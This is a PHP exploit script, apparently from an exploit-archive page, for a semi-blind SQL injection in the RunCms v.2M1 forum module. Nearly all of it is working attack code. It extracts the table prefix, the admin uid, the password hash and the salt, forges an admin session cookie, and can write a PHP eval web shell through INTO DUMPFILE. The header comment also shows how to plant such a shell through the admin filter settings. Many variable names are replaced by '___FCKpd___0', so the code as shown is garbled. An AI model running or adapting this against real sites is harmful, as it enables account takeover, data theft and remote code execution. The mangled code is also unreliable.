|
<?php
/*
RunCms v.2M1 /modules/forum/post.php - 'forum' remote semi-blind SQL Injection Exploit
by Nine:Situations:Group::bookoo
site: http://retrogod.altervista.org/
software site: http://www.runcms.org/
vulnerable code in /modules/forum/post.php near lines 16-34 :
...
if ( empty(___FCKpd___0
POST['forum']) ) {
redirect_header("index.php", 2, _MD_ERRORFORUM);
exit();
}
else if ( empty(___FCKpd___0
POST['message']) ) {
redirect_header("javascript:history.go(-1)", 2, _MD_ERRORMESSAGE);
exit();
}
else {
$sql = "SELECT * FROM ".$bbTable['forums']." WHERE forum_id = ".___FCKpd___0
POST['forum'].""; // <-------- !!!
if (!$result = $db->query($sql)) {
redirect_header("index.php", 2, _MD_CANTGETFORUM);
exit();
}
...
'forum' variable is taken from ___FCKpd___0
POST[] array and inserted in a sql query without
prior santization and without being surrounded by quotes.
Then you can subsequently manipulate this query in /modules/forum/class/class.permissions.php by passing
another 'UNION SELECT' as first argument of the 'UNION SELECT' passed to post.php
(a little bit complex uh? $forum_id is user controlled ...)
100-102:
...
if ($user_id > 0) {
$sql = "SELECT * FROM ".$bbTable['forum_access']." WHERE forum_id=$forum_id AND user_id=$user_id";
...
the result is that you can extract the sha1 hash of the admin user and the corrispondent salt.
If you cannot decrypt the hash... you can always hijack an active session (meaning the admin user
must be logged in) by building the admin cookie, no check ex. on ip address.
To do that you need the table prefix. A default one does not exist, but exists a
'suggested one' when installing the cms, which is 'runcms', but an empty one is not allowed.
However with MySQL 5.0 you can have the table prefix by interrogating information_schema.TABLES
This whole thing works regardless of php.ini settings but you need:
- a valid user account
Register!
- an existing row in [prefix]_forum_forums table
- an existing row in [prefix]_forum_forum_access table
which is very possible against a runcms installation with a working and active forum.
Also, you could manipulate the query in post.php to export a php shell through
'INTO DUMPFILE' method, but you need FILE privilege and magic_quotes_gpc = off.
It's also possible to disclose absolute path in certain conditions (see error_reporting)
by polluting a preg_match() argument:
http://[host]/[path_to_runcms]/modules/contact/index.php?op[]=1
http://[host]/[path_to_runcms]/userinfo.php?uid[]=1
Final notes:
This sql injection vulnerability has to be considerated as high risk because as ADMIN you
can inject php code by the Filter/Banning functionalities, ex:
click 'Administration Menu', then 'System Admin', then click on the Filters/Banning icon,
then 'Prohibited: Emails'
Now you can edit the /modules/system/cache/bademails.php file
Type in:
<?php eval(___FCKpd___0
GET[c]);?>
then you launch commands:
http://[host]/[path_to_runcms]/modules/system/cache/bademails.php?c=system(dir);
you can do the same with all filter utilities ...
*/
$err[0] = "[!] This script is intended to be launched from the cli!";
$err[1] = "[!] You need the curl extesion loaded!";
function my_header() {
print ("\x52\x75\x6e\x43\x6d\x73\x20\x76\x2e\x32\x6d\x31\x20\x2f\x6d\x6f\x64\x75\x6c\x65\x73\x2f\x66\x6f\x72\x75\x6d\x2f\x70\x6f\x73\x74\x2e\x70\x68\x70\x20\x2d\x20\x27\x66\x6f\x72\x75\x6d\x27\x20\x72\x65\x6d\x6f\x74\x65\x20\x73\x65\x6d\x69\x2d\x62\x6c\x69\x6e\x64\x20\x53\x51\x4c\x20\x49\x6e\x6a\x65\x63\x74\x69\x6f\x6e\x20\x45\x78\x70\x6c\x6f\x69\x74\x20\xd\xa\x62\x79\x20\x4e\x69\x6e\x65\x3a\x53\x69\x74\x75\x61\x74\x69\x6f\x6e\x73\x3a\x47\x72\x6f\x75\x70\x3a\x3a\x62\x6f\x6f\x6b\x6f\x6f\xd\xa\x73\x69\x74\x65\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x72\x65\x74\x72\x6f\x67\x6f\x64\x2e\x61\x6c\x74\x65\x72\x76\x69\x73\x74\x61\x2e\x6f\x72\x67\x2f\xd\xa\n");
}
my_header();
if (php_sapi_name() <> "cli") {
die($err[0]);
}
if (!extension_loaded('curl')) {
$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true :
false;
if ($win) {
!dl("php_curl.dll") ? die($err[1]) :
print("[*] curl loaded\n");
} else {
!dl("php_curl.so") ? die($err[1]) :
print("[*] curl loaded\n");
}
}
function syntax() {
print ("Syntax: php ".$argv[0]." [host] [path] [user] [pass] [OPTIONS] \n". "Options: \n". "--port:[port] - specify a port \n". " default->80 \n". "--prefix - try to extract table prefix from information.schema \n". " default->runcms \n". "--proxy:[host:port] - use proxy \n". "--skiptest - skip preliminary tests \n". "--test - run only tests \n". "--export_shell:[path] - try to export a shell with INTO DUMPFILE, needs Mysql\n". " FILE privilege \n". "Examples: php ".$argv[0]." 192.168.0.1 /runcms/ bookoo pass \n". " php ".$argv[0]." 192.168.0.1 / bookoo pass --prefix --proxy:1.1.1.1:8080 \n". " php ".$argv[0]." 192.168.0.1 / bookoo pass --prefix --export_shell:/var/www\n");
die();
}
error_reporting(E_ALL ^ E_NOTICE);
$host = $argv[1];
$path = $argv[2];
___FCKpd___0
user = $argv[3];
___FCKpd___0
pass = $argv[4];
$prefix = "runcms";
$argv[4] ? print("[*] Attacking...\n") :
syntax();
___FCKpd___0
f_prefix = false;
___FCKpd___0
use_proxy = false;
$port = 80;
___FCKpd___0
skiptest = false;
___FCKpd___0
test = false;
$into_outfile = false;
for ($i = 3; $i < $argc; $i++) {
if (stristr($argv[$i], "--prefix")) {
___FCKpd___0
f_prefix = true;
}
if (stristr($argv[$i], "--proxy:")) {
___FCKpd___0
use_proxy = true;
$tmp = explode(":", $argv[$i]);
$proxy_host = $tmp[1];
$proxy_port = (int)$tmp[2];
}
if (stristr($argv[$i], "--port:")) {
$tmp = explode(":", $argv[$i]);
$port = (int)$tmp[1];
}
if (stristr($argv[$i], "--skiptest")) {
___FCKpd___0
skiptest = true;
}
if (stristr($argv[$i], "--test")) {
___FCKpd___0
test = true;
}
if (stristr($argv[$i], "--export_shell:")) {
$tmp = explode(":", $argv[$i]);
$my_path = $tmp[1];
$into_outfile = true;
}
}
function _s($url, $is_post, $ck, $request) {
global ___FCKpd___0
use_proxy, $proxy_host, $proxy_port;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
if ($is_post) {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $request."\r\n");
}
curl_setopt($ch, CURLOPT_HEADER, 1);
$cookies = array("Cookie: ".$ck);
curl_setopt($ch, CURLOPT_HTTPHEADER, $cookies);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Googlebot/2.1");
curl_setopt($ch, CURLOPT_TIMEOUT, 0);
if (___FCKpd___0
use_proxy) {
curl_setopt($ch, CURLOPT_PROXY, $proxy_host.":".$proxy_port);
}
___FCKpd___0
d = curl_exec($ch);
if (curl_errno($ch)) {
die("[!] ".curl_error($ch)."\n");
} else {
curl_close($ch);
}
return ___FCKpd___0
d;
}
function my_encode($str) {
___FCKpd___0
out = "0x";
for ($i = 0; $i < strlen($str); $i++) {
___FCKpd___0
out .= dechex(ord($str[$i]));
}
return ___FCKpd___0
out;
}
function find_prefix() {
global $host, $port, $path, $url, $ck;
___FCKpd___0
tn = "TABLE_NAME";
___FCKpd___0
ift = "information_schema.TABLES";
___FCKpd___0
table_prefix = "";
$j = -15;
___FCKpd___0
sql = "-99999 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 FROM ___FCKpd___0
ift";
___FCKpd___0
sql = urlencode(___FCKpd___0
sql);
$out = _s($url, 1, $ck, "message=1&forum=___FCKpd___0
sql&");
if (chk_err_ii($out)) {
die("[!] ___FCKpd___0
ift not availiable.");
} else {
print "[*] Initiating table prefix extraction...\n";
}
$c = array(0);
$c = array_merge($c, range(0x30, 0x39));
$j = 1;
___FCKpd___0
len = "";
print ("[*] Table name length: ");
while (!stripos (___FCKpd___0
len, "\x00")) {
for ($i = 0; $i <= 0xff; $i++) {
$f = false;
if (in_array($i, $c)) {
___FCKpd___0
enc = my_encode("-999999 UNION SELECT 0,0,1,(CASE WHEN (ASCII(SUBSTR(LENGTH(___FCKpd___0
tn) FROM $j FOR 1))=$i) THEN 1 ELSE 0 END),0,0,0,0,0,0,0,0 FROM ___FCKpd___0
ift WHERE ___FCKpd___0
tn LIKE 0x255f666f72756d5f666f72756d5f67726f75705f616363657373 LIMIT 1 --");
___FCKpd___0
sql = "-99999 UNION SELECT ___FCKpd___0
enc,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 FROM ___FCKpd___0
ift";
___FCKpd___0
sql = urlencode(___FCKpd___0
sql);
$out = _s($url, 1, $ck, "message=1&forum=___FCKpd___0
sql&");
if (chk_err($out)) {
$f = true;
___FCKpd___0
len .= chr($i);
print chr($i);
break;
}
}
}
if ($f == false) {
die("\n[!] Unknown error ...");
}
$j++;
}
___FCKpd___0
len = (int) ___FCKpd___0
len - 25;
print ("\n[*] Prefix length: ".___FCKpd___0
len."\n");
$c = array(0);
$c = array_merge($c, range(0x21, 0x7E));
$j = 1;
___FCKpd___0
table_prefix = "";
print ("[*] Table prefix: ");
while ((!stripos (___FCKpd___0
table_prefix, "\x00")) and (!(strlen(___FCKpd___0
table_prefix) == ___FCKpd___0
len))) {
for ($i = 0; $i <= 0xff; $i++) {
$f = false;
if (in_array($i, $c)) {
___FCKpd___0
enc = my_encode("-999999 UNION SELECT 0,0,1,(CASE WHEN (ASCII(SUBSTR(___FCKpd___0
tn FROM $j FOR 1))=$i) THEN 1 ELSE 0 END),0,0,0,0,0,0,0,0 FROM ___FCKpd___0
ift WHERE ___FCKpd___0
tn LIKE 0x255f666f72756d5f666f72756d5f67726f75705f616363657373 LIMIT 1 --");
___FCKpd___0
sql = "-99999 UNION SELECT ___FCKpd___0
enc,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 FROM ___FCKpd___0
ift";
___FCKpd___0
sql = urlencode(___FCKpd___0
sql);
$out = _s($url, 1, $ck, "message=1&forum=___FCKpd___0
sql&");
if (chk_err($out)) {
$f = true;
___FCKpd___0
table_prefix .= chr($i);
print chr($i);
break;
}
}
}
if ($f == false) {
die("\n[!] Unknown error ...");
}
$j++;
}
return ___FCKpd___0
table_prefix;
}
function export_sh() {
global $url, $prefix, $my_path, $ck;
//change php code if you want
___FCKpd___0
enc = my_encode("<?php eval(\___FCKpd___0
GET[c]);?>"); //just for the purpose of hiding from the eye, you have to use single quotes for INTO DUMPFILE
___FCKpd___0
sql = "-99999 UNION SELECT null,___FCKpd___0
enc,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null INTO DUMPFILE '".$my_path."/sh.php' FROM ".$prefix."_forum_forums";
___FCKpd___0
sql = urlencode(___FCKpd___0
sql);
___FCKpd___0
o = _s($url, 1, $ck, "message=1&forum=___FCKpd___0
sql&");
if (chk_err_ii($o)) {
die("[!] mmm, failed!");
} else {
die("[*] Seems ok. Check the shell manually. It was the right path?");
}
}
function chk_login($s) {
if (stripos ($s, "\x54\x68\x61\x6e\x6b\x20\x79\x6f\x75\x20\x66\x6f\x72\x20\x6c\x6f\x67\x67\x69\x6e\x67\x20\x69\x6e")) {
return true;
} else {
return false;
}
}
function chk_err($s) {
if (stripos ($s, "\x77\x68\x69\x6c\x65\x20\x71\x75\x65\x72\x79\x69\x6e\x67\x20\x74\x68\x65\x20\x64\x61\x74\x61\x62\x61\x73\x65")){
return true;
} else {
return false;
}
}
function chk_err_ii($s) {
if (stripos ($s, "\x74\x20\x67\x65\x74\x20\x66\x6f\x72\x75\x6d\x20\x64\x61\x74\x61")) {
return true;
} else {
return false;
}
}
$url = "http://$host:$port".$path."user.php";
$out = _s($url, 1, "", "uname=___FCKpd___0
user&pass=___FCKpd___0
pass&op=login&");
if (chk_login($out)) {
print("[*] Logged in!\n");
} else {
die("[!] Not logged in.");
}
$tmp = explode("Set-Cookie: ", $out);
$ck = "";
for ($i = 1; $i < count($tmp); $i++) {
$ttmp = explode(" ", $tmp[$i]);
$ck .= " ".$ttmp[0];
}
//echo "[*] Your cookie->".$ck."\n";
$url = "http://$host:$port".$path."modules/forum/post.php";
___FCKpd___0
sql = "1 1 1";
___FCKpd___0
sql = urlencode(___FCKpd___0
sql);
if (!___FCKpd___0
skiptest) {
$out = _s($url, 1, $ck, "message=1&forum=___FCKpd___0
sql&");
if (chk_err_ii($out)) {
print("[*] Vulnerable!\n");
} else {
die("[!] Not vulnerable.");
}
}
if (___FCKpd___0
test) {
die;
}
if (___FCKpd___0
f_prefix == true) {
$prefix = find_prefix();
}
if ($into_outfile == true) {
export_sh();
}
$c = array(0);
$c = array_merge($c, range(0x30, 0x39));
___FCKpd___0
uid = "";
print ("\n[*] admin uid: ");
$j = 1;
while (!stripos (___FCKpd___0
uid, "\x00")) {
for ($i = 0; $i <= 0xff; $i++) {
$f = false;
if (in_array($i, $c)) {
___FCKpd___0
enc = my_encode("-999999 UNION SELECT 0,0,1,(CASE WHEN (ASCII(SUBSTR(uid FROM $j FOR 1))=$i) THEN 1 ELSE 0 END),0,0,0,0,0,0,0,0 FROM ".$prefix."_users WHERE level=5 LIMIT 1 --");
___FCKpd___0
sql = "-99999 UNION SELECT ___FCKpd___0
enc,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 FROM ".$prefix."_forum_forums";
___FCKpd___0
sql = urlencode(___FCKpd___0
sql);
$out = _s($url, 1, $ck, "message=1&forum=___FCKpd___0
sql&");
if (chk_err($out)) {
$f = true;
___FCKpd___0
uid .= chr($i);
print chr($i);
break;
}
}
}
if ($f == false) {
die("\n[!] Unknown error ...");
}
$j++;
}
___FCKpd___0
uid = (int) ___FCKpd___0
uid;
$c = array(0);
$c = array_merge($c, range(0x30, 0x39));
$c = array_merge($c, range(0x61, 0x66));
___FCKpd___0
hash = "";
print ("\n[*] Initiating hash extraction ...\n[*] pwd hash: ");
$j = 1;
while (!stripos (___FCKpd___0
hash, "\x00")) {
for ($i = 0; $i <= 0xff; $i++) {
$f = false;
if (in_array($i, $c)) {
___FCKpd___0
enc = my_encode("-999999 UNION SELECT 0,0,1,(CASE WHEN (ASCII(SUBSTR(pass FROM $j FOR 1))=$i) THEN 1 ELSE 0 END),0,0,0,0,0,0,0,0 FROM ".$prefix."_users WHERE uid=___FCKpd___0
uid LIMIT 1 --");
___FCKpd___0
sql = "-99999 UNION SELECT ___FCKpd___0
enc,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 FROM ".$prefix."_forum_forums";
___FCKpd___0
sql = urlencode(___FCKpd___0
sql);
$out = _s($url, 1, $ck, "message=1&forum=___FCKpd___0
sql&");
if (chk_err($out)) {
$f = true;
___FCKpd___0
hash .= chr($i);
print chr($i);
break;
}
}
}
if ($f == false) {
die("\n[!] Unknown error ...");
}
$j++;
}
___FCKpd___0
salt = "";
print ("\n[*] salt: ");
$j = 1;
while (!stripos (___FCKpd___0
salt, "\x00")) {
for ($i = 0; $i <= 0xff; $i++) {
$f = false;
if (in_array($i, $c)) {
___FCKpd___0
enc = my_encode("-999999 UNION SELECT 0,0,1,(CASE WHEN (ASCII(SUBSTR(pwdsalt FROM $j FOR 1))=$i) THEN 1 ELSE 0 END),0,0,0,0,0,0,0,0 FROM ".$prefix."_users WHERE uid=___FCKpd___0
uid LIMIT 1 --");
___FCKpd___0
sql = "-99999 UNION SELECT ___FCKpd___0
enc,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 FROM ".$prefix."_forum_forums";
___FCKpd___0
sql = urlencode(___FCKpd___0
sql);
$out = _s($url, 1, $ck, "message=1&forum=___FCKpd___0
sql&");
if (chk_err($out)) {
$f = true;
___FCKpd___0
salt .= chr($i);
print chr($i);
break;
}
}
}
if ($f == false) {
die("\n[!] Unknown error ...");
}
$j++;
}
print("\n[*] Admin cookie: rc2_sess=". urlencode(serialize(array(___FCKpd___0
uid, sha1(trim(___FCKpd___0
hash).trim(___FCKpd___0
salt)), time()+ 2678400))).";");
?>
|
推荐
评论(0条)
